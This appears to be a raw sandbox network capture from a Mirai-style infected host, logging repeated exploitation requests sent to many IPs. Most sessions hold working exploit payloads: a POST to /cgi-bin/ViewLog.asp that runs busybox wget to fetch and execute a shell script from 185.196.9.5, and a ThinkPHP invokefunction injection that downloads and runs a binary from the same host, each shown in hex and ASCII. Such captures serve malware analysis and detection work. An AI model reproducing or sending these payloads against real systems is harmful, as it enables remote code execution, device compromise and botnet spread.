Feb 25, 2024 19:05:38.788551092 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:44.936489105 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1246	192.168.2.15	49836	95.213.182.13	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:35.761857033 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1247	192.168.2.15	38586	88.99.185.238	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:35.802185059 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:35.990283012 CET	1286	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:05:35 GMT Server: Apache Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {
Feb 25, 2024 19:05:35.990303993 CET	1286	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d Data Ascii: font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-co
Feb 25, 2024 19:05:35.990320921 CET	1286	IN	Data Raw: 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 Data Ascii: { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align
Feb 25, 2024 19:05:35.990340948 CET	1286	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0;
Feb 25, 2024 19:05:35.990360022 CET	1286	IN	Data Raw: 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 Data Ascii: bGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGS
Feb 25, 2024 19:05:35.990380049 CET	1286	IN	Data Raw: 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33 Data Ascii: 5U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGE
Feb 25, 2024 19:05:35.990398884 CET	1096	IN	Data Raw: 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38 Data Ascii: LWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hX
Feb 25, 2024 19:05:35.990591049 CET	1286	IN	Data Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to tenpercent.tenpercent.com.ec's <a href="mailto:mon
Feb 25, 2024 19:05:35.990609884 CET	359	IN	Data Raw: 3d 63 70 6c 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c 65 3d 22 63 50 61 6e Data Ascii: =cplogo&utm_content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copyright

Session ID	Source IP	Source Port	Destination IP	Destination Port
1248	192.168.2.15	55812	88.210.82.163	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:35.884392977 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:36.134022951 CET	516	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Sun, 25 Feb 2024 18:05:34 GMT Server: lighttpd/1.4.34 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1249	192.168.2.15	45328	88.221.255.175	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:35.890753031 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:36.068823099 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:05:35 GMT Date: Sun, 25 Feb 2024 18:05:35 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 66 66 66 64 64 35 38 26 23 34 36 3b 31 37 30 38 38 38 34 33 33 35 26 23 34 36 3b 62 35 30 37 33 65 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.afffdd58.1708884335.b5073ec</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1250	192.168.2.15	51218	31.136.247.221	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:36.123433113 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:36.676598072 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:37.764713049 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:40.068670034 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:44.420816898 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1251	192.168.2.15	53564	31.136.21.250	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:36.125076056 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:36.676608086 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:37.796642065 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:40.068656921 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:44.676642895 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1252	192.168.2.15	36320	31.136.184.86	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:36.125466108 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:36.676616907 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:37.796649933 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
